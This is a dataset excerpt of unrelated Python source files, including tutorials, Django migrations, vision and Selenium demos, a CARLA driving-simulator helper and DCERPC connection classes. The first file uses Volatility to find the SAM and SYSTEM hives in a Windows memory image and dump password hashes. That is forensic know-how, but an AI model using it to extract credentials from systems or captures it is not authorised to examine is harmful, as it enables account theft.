text stringlengths 38 1.54M |
|---|
import sys
import struct
memory_file = "WinXPSP2.vmem"
sys.path.append("/Downloads/volatility-2.3.1")
import volatility.conf as conf
import volatility.registry as registry
registry.PluginImporter()
config = conf.ConfObject()
import volatility.commands as commands
import volatility.addrspace as addrspace
config.parse_options()
config.PROFILE = "WinXPSP2x86"
config.LOCATION = "file://%s" % memory_file
registry.register_global_options(config, commands.Command)
registry.register_global_options(config, addrspace.BaseAddressSpace)
from volatility.plugins.registry.registryapi import RegistryApi
from volatility.plugins.registry.lsadump import HashDump
registry = RegistryApi(config)
registry.populate_offsets()
sam_offset = None
sys_offset = None
for offset in registry.all_offsets:
if registry.all_offsets[offset].endswith("\\SAM"):
sam_offset = offset
print "[*] SAM: 0x%08x" % offset
if registry.all_offsets[offset].endswith("\\system"):
sys_offset = offset
print "[*] System: 0x%08x" % offset
if sam_offset is not None and sys_offset is not None:
config.sys_offset = sys_offset
config.sam_offset = sam_offset
hashdump = HashDump(config)
for hash in hashdump.calculate():
print hash
break
if sam_offset is None or sys_offset is None:
print "[*] Failed to find the system or SAM offsets." |
#-------------------------------------------------------#
# Una clase es un constructor de objetos
#
# Class es la palabra reservada de Python para
# crear una clase.
#
# Las clases pueden contener variables, funciones
# y constructores.
#
# Las funciones y los constructores pueden estar
# sobrecargados.
#
# __init__ es el nombre especial para la función
# constructor.
#
# self es un parámetro especial que permite acceder
# al objeto mismo.
#-------------------------------------------------------#
from datetime import datetime
class Alumno:
    """A student: name, surname, birth date, and a derived age."""

    # Class-level defaults; instances overwrite these.
    nombre = ""
    apellidos = ""
    fechaNacimiento = ""
    edad = 0

    def __init__(self, nombre, apellidos) -> None:
        """Create a student from a first name and surname."""
        self.nombre = nombre
        self.apellidos = apellidos

    def saluda(self) -> None:
        """Print a greeting for the student."""
        print(f'Hola {self.nombre} {self.apellidos} !!!')

    def setfechaNacimiento(self, fecha) -> None:
        """Parse *fecha* as dd-mm-yy (exactly 8 chars) or dd-mm-yyyy,
        store it as a date, and recompute the age.

        Prints an error message instead of raising on a bad format.
        """
        try:
            if len(fecha) == 8:
                # Two-digit year, e.g. "26-07-92".
                self.fechaNacimiento = datetime.strptime(fecha, '%d-%m-%y').date()
            else:
                self.fechaNacimiento = datetime.strptime(fecha, '%d-%m-%Y').date()
            self.__calcularEdad()
        except ValueError:
            # Bug fix: the original bare `except:` would also have hidden
            # unrelated programming errors; only parsing failures belong here.
            print("Formato incorrecto. [dd-mm-yyyy] || [dd-mm-yy] ")

    def __calcularEdad(self):
        """Compute the age in completed years.

        Bug fix: the original subtracted only the years, over-counting by
        one before the birthday has passed in the current year.
        """
        today = datetime.now().date()
        before_birthday = (today.month, today.day) < (
            self.fechaNacimiento.month, self.fechaNacimiento.day)
        self.edad = today.year - self.fechaNacimiento.year - int(before_birthday)

    def getFechaNacimiento(self) -> datetime:
        """Return the parsed birth date (a datetime.date)."""
        return self.fechaNacimiento

    def getEdad(self) -> int:
        """Return the age, or print an error (and return None) when the
        birth date was never set (edad still 0)."""
        try:
            if self.edad == 0:
                raise Exception("Debes incluir la fecha de nacimiento.")
            return self.edad
        except Exception as e:
            print(e)

    def getNombre(self) -> str:
        """Return the first name."""
        return self.nombre

    def getApellidos(self) -> str:
        """Return the surname."""
        return self.apellidos
# Quick demo: create a student, greet, set the birth date and print the age.
alumno = Alumno("Pepito", "Pérez")
alumno.saluda()
# 8-character form, parsed as dd-mm-yy.
alumno.setfechaNacimiento("26-07-92")
print(f"Edad: {alumno.getEdad()} años.")
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-11-16 03:58
from __future__ import unicode_literals
from django.db import migrations, models
import webapp.models
class Migration(migrations.Migration):
    """Auto-generated schema migration: adds Opportunity.location and
    redefines Organization.organization_banner as an ImageField."""

    # Must be applied after this earlier webapp migration.
    dependencies = [
        ('webapp', '0003_auto_20171115_0851'),
    ]

    operations = [
        # New nullable free-text location on Opportunity.
        migrations.AddField(
            model_name='opportunity',
            name='location',
            field=models.TextField(null=True),
        ),
        # Banner stored via the user_directory_path upload callable.
        migrations.AlterField(
            model_name='organization',
            name='organization_banner',
            field=models.ImageField(default=None, upload_to=webapp.models.user_directory_path),
        ),
    ]
|
from GO4StructuralPatterns.FlyweightPattern.UnitFactory import UnitFactory
from GO4StructuralPatterns.FlyweightPattern.Target import Target
if __name__ == '__main__':
    # Flyweight demo: two distinct Target objects share one 'tank' unit
    # handed out by the factory.
    factory = UnitFactory()

    first_tank = Target()
    first_tank.unit = factory.get_unit('tank')

    second_tank = Target()
    second_tank.unit = factory.get_unit('tank')

    print(">>>>>>>>>>>> ID of Tanks")
    print(first_tank.id)
    print(second_tank.id)

    print(">>>>>>>>>>>> Unit Details Of Tank")
    print(first_tank.unit)
    print(second_tank.unit)
|
"""Add and subtract"""
import cv2 as cv
import numpy as np
# Load the sample image. Bug fix: cv.imread returns None (no exception)
# when the file is missing, which would crash later in resize — fail loudly.
img = cv.imread('fish.jpg')
if img is None:
    raise FileNotFoundError("Could not read 'fish.jpg'")

# Work at half resolution so the three-image montage stays small.
img = cv.resize(img, None, fx=0.5, fy=0.5, interpolation=cv.INTER_CUBIC)

# Constant brightness offset. cv.add / cv.subtract saturate at 0/255
# instead of wrapping around like raw uint8 numpy arithmetic would.
M = np.ones(img.shape, dtype='uint8') * 40
brighter = cv.add(img, M)
darker = cv.subtract(img, M)

# Show original, brighter and darker side by side until a key is pressed.
img2 = np.hstack([img, brighter, darker])
cv.imshow('window', img2)
cv.waitKey(0)
cv.destroyAllWindows()
# Read N words and keep a doubled copy of each ("ab" -> "abab").
# A word X is a rotation of an equal-length word Y iff X is a substring
# of Y+Y, which is what the doubled list is used for below.
N = int(input())
wordlist = []
seclist = []
for i in range(N):
    wordlist.append(input())
    seclist.append(wordlist[i]*2)

# Count how many words match at least one (not yet consumed) doubled word.
existcnt = 0
for i in range(0, N):
    cnt = 0
    for j in range(0, N):
        # Same length and a substring of the doubled word -> rotation match.
        if (len(wordlist[i]) == len(seclist[j])/2) and (str(wordlist[i]) in str(seclist[j])):
            # Blank the matched entry so it cannot be paired again; this
            # makes the result order-dependent — presumably each doubled
            # word may be consumed by at most one match (TODO confirm).
            seclist[j] = ''
            cnt += 1
    if cnt > 0:
        existcnt += 1
print(existcnt)
# It was accepted!!!  (original comment: "맞았다!!!")
from enum import unique, Enum
@unique
class LambdaInvocationType(Enum):
    """Invocation types for a Lambda call; values are plain ints."""

    # Bug fix: the original had a trailing comma after 1, which silently
    # made the member value the tuple (1,) instead of the int 1.
    RequestResponse = 1
    Event = 2
|
from rest_framework import serializers
from processes.models import Process,Process_User
from queues.serializers import QueueSerializer
class ProcessSerializer(serializers.ModelSerializer):
    """Read serializer for Process, exposing all fields plus nested queues."""

    queues = QueueSerializer(many=True)

    class Meta:
        model = Process
        fields = '__all__'
class CreateProcessSerializer(serializers.ModelSerializer):
    """Write serializer for Process (no nested queue expansion)."""

    class Meta:
        model = Process
        fields = '__all__'
class ProcessUserSerializer(serializers.ModelSerializer):
    """Read serializer for Process_User, exposing only the process link."""

    class Meta:
        model = Process_User
        fields = ['process']
class CreateProcessUserSerializer(serializers.ModelSerializer):
    """Write serializer for Process_User with every field included."""

    class Meta:
        model = Process_User
        fields = '__all__'
|
from sqlalchemy import or_
from lib.util_sqlalchemy import ResourceMixin
from app.extensions import db
class Table(ResourceMixin, db.Model):
    """A table record, linked to a user and (by string id) to a base."""

    __tablename__ = 'tables'

    # Columns.
    id = db.Column(db.Integer, primary_key=True)
    table_id = db.Column(db.String(255), unique=False, index=True, nullable=True, server_default='')
    table_name = db.Column(db.String(255), unique=False, index=True, nullable=True, server_default='')

    # Relationships.
    user_id = db.Column(db.Integer, db.ForeignKey('users.id', onupdate='CASCADE', ondelete='CASCADE'),
                        index=True, nullable=True, primary_key=False, unique=False)
    base_id = db.Column(db.String(255), db.ForeignKey('bases.base_id', onupdate='CASCADE', ondelete='CASCADE'),
                        index=True, nullable=True, primary_key=False, unique=False)

    def __init__(self, **kwargs):
        # Call Flask-SQLAlchemy's constructor.
        super(Table, self).__init__(**kwargs)

    @classmethod
    def find_by_id(cls, identity):
        """
        Find a table by its primary key.

        :param identity: Primary key value
        :return: Table instance or None

        Bug fix: the original called ``.first()`` on the comparison
        expression *inside* ``filter()``; it must be called on the query.
        """
        return cls.query.filter(cls.id == identity).first()

    @classmethod
    def search(cls, query):
        """
        Search a resource by 1 or more fields.

        :param query: Search query
        :type query: str
        :return: SQLAlchemy filter
        """
        if not query:
            return ''

        search_query = '%{0}%'.format(query)
        # Bug fix: the original built a single (non-tuple) clause and then
        # star-unpacked it into or_(), which fails at runtime. Search the
        # text columns, matching the "1 or more fields" contract above.
        search_chain = (cls.table_id.ilike(search_query),
                        cls.table_name.ilike(search_query))

        return or_(*search_chain)

    @classmethod
    def bulk_delete(cls, ids):
        """
        Delete tables one at a time so each row's delete hook still runs.

        :param ids: List of ids to be deleted
        :type ids: list
        :return: int number of rows deleted
        """
        delete_count = 0

        for id in ids:
            table = cls.query.get(id)
            if table is None:
                continue
            table.delete()
            delete_count += 1

        return delete_count
|
import time
import pytest
import logging
from selenium import webdriver
from selenium.webdriver.support.events import EventFiringWebDriver, AbstractEventListener
from selenium.webdriver.common.keys import Keys
import json
from OpenCart.Drivers import get_driver_path
@pytest.fixture
def chrome_browser(request):
    """Pytest fixture: a maximized Chrome wrapped in an EventFiringWebDriver
    that reports to MyListener; the browser is quit when the test finishes."""
    options = webdriver.ChromeOptions()
    options.add_argument("start-maximized")
    # Bug fix: the original built `options` but never passed it to Chrome,
    # so "start-maximized" had no effect.
    wd = EventFiringWebDriver(
        webdriver.Chrome(executable_path=get_driver_path(), options=options),
        MyListener())
    request.addfinalizer(wd.quit)
    return wd
class MyListener(AbstractEventListener):
    """WebDriver event listener: logs element lookups and captures a
    screenshot whenever the wrapped driver raises an exception."""

    def before_find(self, by, value, driver):
        # Level 1 is below DEBUG; this only appears with a very low threshold.
        logging.log(1, msg="Hello, Before find!")
        print(by, value)

    def after_find(self, by, value, driver):
        pass
        #print(by, value, "found")

    def on_exception(self, exception, driver):
        # pass
        # Keep visual evidence of the failure for debugging.
        driver.save_screenshot('screenshots/exception.png')
        #print(exception)
def test_logging(chrome_browser):
    """Open a Habr article and interact with the search form; takes a
    final screenshot at the end."""
    chrome_browser.get('https://habr.com/ru/company/skyeng/blog/465291/')
    # NOTE(review): '.search-form-btn12345' looks deliberately wrong — the
    # failed lookup raises, which triggers MyListener.on_exception and its
    # screenshot. Confirm this is the intended demonstration.
    find_button = chrome_browser.find_element_by_id('.search-form-btn12345')
    find_button.click()
    find_field = chrome_browser.find_element_by_id('search-form-field')
    find_field.send_keys('Otus')
    logging.log(1, 'opened list of posts')
    # find_field.send_keys(Keys.ENTER)
    chrome_browser.save_screenshot('screenshots/finish_test.png')
|
import copy
from typing import List
from aiosmb.dcerpc.v5.common.connection.connectionstring import DCERPCStringBinding
from asysocks.unicomm.common.proxy import UniProxyTarget
from asysocks.unicomm.common.target import UniTarget, UniProto
class DCERPCTarget(UniTarget):
    """One resolved DCERPC endpoint: network address plus the RPC protocol
    sequence ('ncacn_ip_tcp', 'ncacn_np', ...). Concrete transports are the
    subclasses defined below in this module."""

    def __init__(self, connection_string:str, ip, port, protocol, rpcprotocol, proxies = None, timeout = 1, hostname = None, domain = None, dc_ip = None, smb_connection = None, pipe=None):
        # rpcprotocol is the protocol-sequence string, e.g. 'ncacn_ip_tcp';
        # pipe is only meaningful for the SMB (ncacn_np) transport.
        self.connection_string = connection_string
        self.rpcprotocol = rpcprotocol
        self.pipe = pipe
        self.smb_connection = smb_connection #storing the smb connection if already exists...
        UniTarget.__init__(self, ip, port, protocol, timeout, hostname = hostname, proxies = proxies, domain = domain, dc_ip = dc_ip)

    def get_hostname_or_ip(self):
        # Prefer whatever an existing SMB connection already resolved.
        if self.smb_connection is not None:
            return self.smb_connection.target.get_hostname_or_ip()
        if self.hostname is None:
            return self.ip
        return self.hostname

    def get_ip_or_hostname(self):
        # Same delegation as above, but with the IP taking precedence.
        if self.smb_connection is not None:
            return self.smb_connection.target.get_ip_or_hostname()
        if self.ip is None:
            return self.hostname
        return self.ip

    #def to_target_string(self) -> str:
    #    if self.hostname is None:
    #        raise Exception('Hostname is None!')
    #    if self.domain is None:
    #        raise Exception('Domain is None!')
    #    return 'cifs/%s@%s' % (self.hostname, self.domain)

    def to_target_string(self) -> str:
        # SPN-style identifier, e.g. 'cifs/host@domain'.
        if self.smb_connection is not None:
            return self.smb_connection.target.to_target_string()
        return 'cifs/%s@%s' % (self.hostname, self.domain)

    @staticmethod
    def from_smbconnection(smb_connection, pipe = None):
        """Build an SMB-transport target that reuses an existing SMB connection."""
        if pipe is None:
            target = DCERPCSMBTarget(None, smb_connection.target.get_ip_or_hostname(), smb_connection=smb_connection, timeout = smb_connection.target.timeout, hostname=smb_connection.target.get_hostname_or_ip())
        else:
            target = DCERPCSMBTarget(None, smb_connection.target.get_ip_or_hostname(), pipe, smb_connection=smb_connection, timeout = smb_connection.target.timeout, hostname=smb_connection.target.get_hostname_or_ip())
        return target

    @staticmethod
    def from_connection_string(s, smb_connection = None, timeout = 1, proxies:List[UniProxyTarget] = None, dc_ip:str = None, domain:str = None, hostname:str = None):
        """Parse a DCERPC string binding (str or DCERPCStringBinding) and
        return the matching concrete target subclass."""
        if isinstance(s, str):
            connection_string = DCERPCStringBinding(s)
        elif isinstance(s, DCERPCStringBinding):
            connection_string = s
        else:
            raise Exception('Unknown string binding type %s' % type(s))

        # Inherit the domain from an existing SMB connection if not given.
        if domain is None and smb_connection is not None:
            domain = smb_connection.target.domain

        na = connection_string.get_network_address()
        ps = connection_string.get_protocol_sequence()
        if ps == 'ncadg_ip_udp':
            raise Exception('DCERPC UDP not implemented')
            # NOTE(review): unreachable after the raise above.
            port = connection_string.get_endpoint()
            target = DCERPCUDPTarget(connection_string, na, int(port), timeout = timeout)
        elif ps == 'ncacn_ip_tcp':
            port = connection_string.get_endpoint()
            target = DCERPCTCPTarget(connection_string, na, port, timeout = timeout, dc_ip=dc_ip, domain = domain, hostname = hostname)
        elif ps == 'ncacn_http':
            raise Exception('DCERPC HTTP not implemented')
            # NOTE(review): unreachable, and `port` would be undefined here.
            target = DCERPCHTTPTarget(connection_string, na, int(port), timeout = timeout)
        elif ps == 'ncacn_np':
            named_pipe = connection_string.get_endpoint()
            if named_pipe:
                # Drop the leading '\pipe' prefix from the endpoint string.
                named_pipe = named_pipe[len(r'\pipe'):]
                target = DCERPCSMBTarget(connection_string, na, pipe=named_pipe, smb_connection=smb_connection, timeout = timeout, hostname = hostname)
            else:
                target = DCERPCSMBTarget(connection_string, na, smb_connection=smb_connection, timeout = timeout, hostname = hostname)
        elif ps == 'ncalocal':
            raise Exception('DCERPC LOCAL not implemented')
            # NOTE(review): unreachable after the raise above.
            target = DCERPCLocalTarget(connection_string, na, int(port), timeout = timeout)
        else:
            raise Exception('Unknown DCERPC protocol %s' % ps)

        if proxies is not None:
            target.proxies = copy.deepcopy(proxies)
        # Proxies configured on an existing SMB connection take precedence.
        if smb_connection is not None:
            if smb_connection.target.proxies is not None:
                target.proxies = copy.deepcopy(smb_connection.target.proxies)

        return target

    def __str__(self):
        t = '==== DCERPCTarget ====\r\n'
        for k in self.__dict__:
            t += '%s: %s\r\n' % (k, self.__dict__[k])
        return t

    def __hash__(self):
        # Hash all identity-relevant fields; __eq__ below compares hashes.
        return hash(str(self.connection_string) + str(self.rpcprotocol) + str(self.pipe) +\
            str(self.ip) + str(self.port) + str(self.protocol) + str(self.timeout) +\
            str(self.hostname) + str(self.domain) + str(self.dc_ip))

    def __eq__(self, other):
        if not isinstance(other, DCERPCTarget):
            return False
        return self.__hash__() == other.__hash__()
class DCERPCTCPTarget(DCERPCTarget):
    """DCERPC endpoint reached over a direct TCP connection (ncacn_ip_tcp)."""

    def __init__(self, connection_string, ip, port, timeout = 1, proxies = None, dc_ip:str = None, domain:str = None, hostname = None):
        super().__init__(
            connection_string, ip, int(port),
            UniProto.CLIENT_TCP, 'ncacn_ip_tcp',
            proxies=proxies, timeout=timeout, hostname=hostname,
            domain=domain, dc_ip=dc_ip,
        )
class DCERPCUDPTarget(DCERPCTarget):
    """DCERPC endpoint reached over UDP datagrams (ncadg_ip_udp)."""

    def __init__(self, connection_string, ip, port, timeout = 1, proxies = None, dc_ip:str = None, domain:str = None, hostname = None):
        super().__init__(
            connection_string, ip, int(port),
            UniProto.CLIENT_UDP, 'ncadg_ip_udp',
            proxies=proxies, timeout=timeout, hostname=hostname,
            domain=domain, dc_ip=dc_ip,
        )
class DCERPCSMBTarget(DCERPCTarget):
    """DCERPC endpoint tunneled through an SMB named pipe (ncacn_np)."""

    def __init__(self, connection_string, ip, pipe = None, smb_connection = None, timeout = 1, hostname = None):
        # Bug fix: the original dereferenced smb_connection.target even when
        # smb_connection is None (which from_connection_string allows),
        # raising AttributeError. Fall back to None-valued settings then.
        target = smb_connection.target if smb_connection is not None else None
        DCERPCTarget.__init__(
            self,
            connection_string,
            ip,
            None,  # no direct port: the SMB pipe carries the traffic
            UniProto.CLIENT_TCP,
            'ncacn_np',
            proxies = target.proxies if target is not None else None,
            timeout = timeout,
            hostname = hostname,
            domain = target.domain if target is not None else None,
            dc_ip = target.dc_ip if target is not None else None,
            smb_connection = smb_connection,
            pipe = pipe
        )
class DCERPCHTTPTarget(DCERPCTarget):
    """DCERPC endpoint reached via RPC over HTTP (ncacn_http)."""

    def __init__(self, connection_string, ip, port, timeout = 1, proxies = None, domain = None, dc_ip = None, hostname = None):
        super().__init__(
            connection_string, ip, port,
            UniProto.CLIENT_TCP, 'ncacn_http',
            proxies=proxies, timeout=timeout, hostname=hostname,
            domain=domain, dc_ip=dc_ip,
        )
        # Post-init fixups kept from the original: normalise host and port.
        self.set_hostname_or_ip(ip)
        self.port = int(port)
class DCERPCLocalTarget(DCERPCTarget):
    """DCERPC over a local transport (ncalocal) — not implemented."""

    def __init__(self, connection_string, ip, port, timeout = 1, hostname = None):
        # The original contained dead code after this raise that referenced
        # the undefined name DCERPCTargetType; it has been removed since it
        # could never execute (and would NameError if it did).
        raise NotImplementedError()
if __name__ == '__main__':
    # Smoke test only: feeds an empty connection string to the parser.
    s = ''
    target = DCERPCTarget.from_connection_string(s)
|
# ~~~~parameters~~~~~
# the src file with answer
test_file = '/home/vistajin/Desktop/test-001.txt'

# flag is True while we are inside a question block (between a "*Question"
# header line and its "Answer:" line).
flag = False
with open(test_file, 'r', encoding='UTF-8') as f:
    all_content = f.readlines()
    for line in all_content:
        if line.startswith("*Question"):
            flag = True
            print("===================================")
            # Strip the asterisks so only the question text is printed below.
            line = line.replace("*", "")
        elif line.find("Answer: ") != -1:
            if flag:
                # Prints only the "Answer: " label; the answer text itself
                # is suppressed (flag goes False before the print below) —
                # presumably this produces a quiz without answers. Confirm.
                print("Answer: ")
                flag = False
        if flag:
            print(line.strip())
|
# Read two integers; print their sum when it is below 1000,
# otherwise print their product. (Prompts and output are in Russian.)
user_input = int(input('Введите первое число: '))
user_input2 = int(input('Введите второе число: '))
result = user_input + user_input2
result2 = user_input * user_input2
if result < 1000:
    # "Sum of A and B = result"
    print(f'Сумма {user_input} и {user_input2} = {result}')
else:
    # "Product of A and B = result2"
    print (f'Произведение {user_input} и {user_input2} = {result2}')
|
import math
import sys
from os import rename
import requests
print("This is a test")
# Robustness fix: give the request a deadline — without a timeout,
# requests.get can block indefinitely on a stalled connection.
r = requests.get(
    "https://www.google.com/webhp?hl=en&sa=X&ved=0ahUKEwjh2rWO5o3oAhUtxosKHdW6AigQPAgH",
    timeout=10,
)
print(r.ok)
print(r.status_code)
a = "asdas"
|
# Salary raise rule: above R$1250.00 the raise is 10%, otherwise 15%.
s = float(input('Qual o salário do funcionário? R$ '))
if s > 1250.00:
    # The \33[..m sequences are ANSI colour escape codes for terminal output.
    print('Quem ganhava R$ \33[33m{:.2f}\33[m, passa a ganhar R$ \33[36m{:.2f}\33[m agora.'.format(s, (s * 1.10)))
elif s <= 1250.00:
    print('Quem ganhava R$ \33[33m{:.2f}\33[m, passa a ganhar R$ \33[31m{:.2f}\33[m agora.'.format(s, (s * 1.15)))
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Auto-generated migration: makes Contacts.mail_1 an optional
    CharField (max 200 chars) with a Russian verbose name."""

    # Must be applied after this earlier oilstandart migration.
    dependencies = [
        ('oilstandart', '0016_auto_20170913_1430'),
    ]

    operations = [
        migrations.AlterField(
            model_name='contacts',
            name='mail_1',
            field=models.CharField(verbose_name='email №1(обязательное поле)', max_length=200, null=True, blank=True),
        ),
    ]
|
import urllib3
url = "http://www.baidu.com"
http = urllib3.PoolManager()  # type: urllib3.poolmanager.PoolManager
print(http.__class__)

# Method 1: low-level urlopen.
response1 = http.urlopen('GET', url)  # type: urllib3.response.HTTPResponse
print("####### 方法1 #######")
# HTTP status code; 200 means success.
print(response1.status)
# NOTE(review): the original comment claimed this prints the length of the
# page content, but it actually prints the HTTP protocol version.
print(response1.version)

# Method 2: the higher-level request() helper.
print("####### 方法2 #######")
response2 = http.request('GET', url)  # type: urllib3.response.HTTPResponse

from urllib import parse
# Percent-encode the query dict — browsers only accept encoded URLs.
kw = {'name': '中国'}
res = parse.urlencode(kw)
print(res)
# And decode it back again.
res2 = parse.unquote(res)
print(res2)
# Example output:
# name=E5%B0%8F%E5%8F%AF
# name=中国
|
# WHY ARE THERE NO ++ AND -- OPERATORS IN PYTHON?
'''
Simple increment and decrement aren't needed as much as in other languages.
You don't write things like for(int i = 0; i < 10; ++i) in Python very often;
instead you do things like for i in range(0, 10)
More in the following link:
http://stackoverflow.com/questions/3654830/why-are-there-no-and-operators-in-python
'''
# PYTHON'S NULL EQUIVALENT: None
'''
http://pythoncentral.io/python-null-equivalent-none/
assign the None type to a variable
my_none_variable = None
database_connection = database.connect()
if database_connection is None:
print('The database could not connect')
else:
print('The database could connect')
It is preferable to use "is None" rather than "== None" to check if a variable is None
it's always advisable to use the is keyword to check if two variables are exactly the same
''' |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
from maths.math_lib import int_nthroot
def isprimepower(n: int):
    """Try to express *n* as x ** power with power >= 2.

    Returns (x, power) for the smallest exponent that works, otherwise
    (n, 1).

    NOTE(review): the base is not checked for primality despite the name —
    e.g. 64 yields (8, 2), not (2, 6). Confirm this matches the intended
    contract of int_nthroot's callers.
    """
    x = n
    power = 1
    # Raise the exponent until the integer root of n drops below 2.
    while x >= 2:
        power += 1
        x = int_nthroot(n, power)
        if x ** power == n:
            return x, power
    return n, 1
# To build the maximum value we choose between multiplying and adding:
# when an operand (or the running result) is 0 or 1, adding beats
# multiplying; otherwise multiplying wins.
# (Original comments were in Korean, translated here.)
nums = list(map(int, input()))
result = nums[0]
for i in range(1, len(nums)):
    if nums[i] <= 1 or result <= 1:
        result += nums[i]
    else:
        result *= nums[i]
print(result)
|
#!/usr/bin/env python
""" Implementation of the CarlaHandler class. CarlaHandler class provides some custom built APIs for Carla. """
__author__ = "Mayank Singal"
__maintainer__ = "Mayank Singal"
__email__ = "mayanksi@andrew.cmu.edu"
__version__ = "0.1"
import random
import time
import math
import numpy as np
import carla
from utils import get_matrix, create_bb_points
from enum import Enum
import re
class RoadOption(Enum):
    """
    RoadOption represents the possible topological configurations when moving from a segment of lane to other.
    """
    # VOID marks the absence of a valid option.
    VOID = -1
    LEFT = 1
    RIGHT = 2
    STRAIGHT = 3
    LANEFOLLOW = 4
    CHANGELANELEFT = 5
    CHANGELANERIGHT = 6
def find_weather_presets():
    """Return [(preset object, human-readable name), ...] for every
    capitalised preset attribute on carla.WeatherParameters."""
    camel_case = re.compile('.+?(?:(?<=[a-z])(?=[A-Z])|(?<=[A-Z])(?=[A-Z][a-z])|$)')

    def pretty(identifier):
        # Split a CamelCase identifier into space-separated words.
        return ' '.join(m.group(0) for m in camel_case.finditer(identifier))

    preset_names = [x for x in dir(carla.WeatherParameters) if re.match('[A-Z].+', x)]
    return [(getattr(carla.WeatherParameters, x), pretty(x)) for x in preset_names]
class CarlaHandler:
    """Convenience wrapper around a carla client: actor spawning/cleanup,
    waypoint queries and filtering, debug drawing, and queries about the
    vehicles/pedestrians around an ego vehicle."""

    def __init__(self, client):
        # client is expected to be a connected carla.Client.
        self.client = client  # TODO: Is this needed?
        self.world = client.get_world()
        self.world_map = self.world.get_map()
        # Pre-generate waypoints for the whole map (default 1 m spacing).
        self.all_waypoints = self.get_waypoints()
        self.blueprint_library = self.world.get_blueprint_library()
        # actor_id -> actor for every actor spawned through this handler.
        self.actor_dict = {}
        # Weather preset index 2 — presumably an arbitrary choice; confirm.
        self.world.set_weather(find_weather_presets()[2][0])
        print("Handler Initialized!\n")

    def __del__(self):
        self.destroy_actors()
        print("Handler destroyed..\n")

    def destroy_actors(self):
        """Destroy only the actors this handler spawned (per actor_dict)."""
        for actor in self.world.get_actors():
            if actor.id in self.actor_dict:
                actor.destroy()
        print("All actors destroyed..\n")

    def get_spawn_points(self):
        """Return the map's recommended spawn points."""
        return self.world_map.get_spawn_points()

    def spawn_vehicle(self, vehicle_type = 'model3', spawn_point=None):
        """Spawn a vehicle (random spawn point when none given) and
        register it; returns (actor, actor_id)."""
        if(spawn_point == None):
            spawn_point = random.choice(self.get_spawn_points())
        vehicle_blueprint = self.blueprint_library.filter(vehicle_type)[0]
        vehicle = self.world.spawn_actor(vehicle_blueprint, spawn_point)
        self.actor_dict[vehicle.id] = vehicle
        print("Vehicle spawned at", spawn_point, "with ID:", vehicle.id, "\n")
        return vehicle, vehicle.id

    def get_waypoints(self, distance=1):
        """Generate map waypoints spaced *distance* metres apart."""
        return self.world_map.generate_waypoints(distance=distance)

    def filter_waypoints(self, waypoints, road_id=None, lane_id=None):
        """Keep only waypoints on road_id (and, when given, lane_id)."""
        filtered_waypoints = []
        for waypoint in waypoints:
            if(lane_id == None):
                if(waypoint.road_id == road_id):
                    filtered_waypoints.append(waypoint)
            else:
                if(waypoint.road_id == road_id and waypoint.lane_id == lane_id):
                    filtered_waypoints.append(waypoint)
        return filtered_waypoints

    def draw_waypoints(self, waypoints, road_id=None, section_id=None, life_time=50.0, color=False):
        """Draw 'O' markers for matching waypoints; color=True uses b=255.

        NOTE(review): a waypoint matching both the road_id and section_id
        checks is drawn twice — confirm whether that is intended.
        """
        if(color):
            b = 255
        else:
            b = 0
        for waypoint in waypoints:
            if(waypoint.road_id == road_id or road_id==None):
                self.world.debug.draw_string(waypoint.transform.location, 'O', draw_shadow=False,
                    color=carla.Color(r=0, g=255, b=b), life_time=life_time,
                    persistent_lines=True)
            if(waypoint.section_id == section_id):
                self.world.debug.draw_string(waypoint.transform.location, 'O', draw_shadow=False,
                    color=carla.Color(r=0, g=255, b=b), life_time=life_time,
                    persistent_lines=True)

    def draw_arrow(self, waypoints, road_id=None, section_id=None, life_time=50.0):
        """Draw a small arrow at each waypoint pointing toward the next one."""
        for i,waypoint in enumerate(waypoints):
            if(i == len(waypoints)-1):
                continue
            trans = waypoints[i+1].transform
            #yaw_in_rad = math.radians(trans.rotation.yaw)
            # NOTE(review): the parentheses look misplaced — this computes
            # radians(arctan(dy)) / dx rather than arctan(dy/dx), and will
            # raise ZeroDivisionError when the x coordinates are equal.
            yaw_in_rad = math.radians(np.arctan(waypoint.transform.location.y - trans.location.y)/(waypoint.transform.location.x - trans.location.x))
            #pitch_in_rad = math.radians(trans.rotation.pitch)
            p1 = carla.Location(
                x=trans.location.x + math.cos(yaw_in_rad),
                y=trans.location.y + math.sin(yaw_in_rad),
                z=trans.location.z)
            if(road_id == None or waypoint.road_id == road_id):
                self.world.debug.draw_arrow(waypoint.transform.location, p1, thickness = 0.01, arrow_size=0.05,
                    color=carla.Color(r=0, g=255, b=0), life_time=life_time)

    def _retrieve_options(self, list_waypoints, current_waypoint):
        """
        Compute the type of connection between the current active waypoint and the multiple waypoints present in
        list_waypoints. The result is encoded as a list of RoadOption enums.
        :param list_waypoints: list with the possible target waypoints in case of multiple options
        :param current_waypoint: current active waypoint
        :return: list of RoadOption enums representing the type of connection from the active waypoint to each
        candidate in list_waypoints
        """
        options = []
        for next_waypoint in list_waypoints:
            # this is needed because something we are linking to
            # the beggining of an intersection, therefore the
            # variation in angle is small
            next_next_waypoint = next_waypoint.next(3.0)[0]
            link = self._compute_connection(current_waypoint, next_next_waypoint)
            options.append(link)
        return options

    def _compute_connection(self, current_waypoint, next_waypoint, threshold=10):
        """
        Compute the type of topological connection between an active waypoint (current_waypoint) and a target waypoint
        (next_waypoint).
        :param current_waypoint: active waypoint
        :param next_waypoint: target waypoint
        :return: the type of topological connection encoded as a RoadOption enum:
        RoadOption.STRAIGHT
        RoadOption.LEFT
        RoadOption.RIGHT
        """
        # Compare the yaw difference (in degrees, folded into [0, 180)).
        n = next_waypoint.transform.rotation.yaw
        n = n % 360.0
        c = current_waypoint.transform.rotation.yaw
        c = c % 360.0
        diff_angle = (n - c) % 180.0
        if diff_angle < threshold or diff_angle > (180 - threshold):
            return RoadOption.STRAIGHT
        elif diff_angle > 90.0:
            return RoadOption.LEFT
        else:
            return RoadOption.RIGHT

    def move_vehicle(self, vehicle_id=None, control=None):
        """Apply a carla control object to a previously-spawned vehicle."""
        if(vehicle_id==None or control==None):
            print("Invalid vechicle motion parameters.")
        else:
            if(self.actor_dict[vehicle_id]==None):
                print("Actor with given ID does not exist")
            else:
                vehicle = self.actor_dict[vehicle_id]
                vehicle.apply_control(control)

    def convert_global_transform_to_actor_frame(self, actor=None, transform=None):
        """Express *transform*'s location in *actor*'s local frame.

        Returns a 4x1 homogeneous-coordinate vector, or None on bad input.
        """
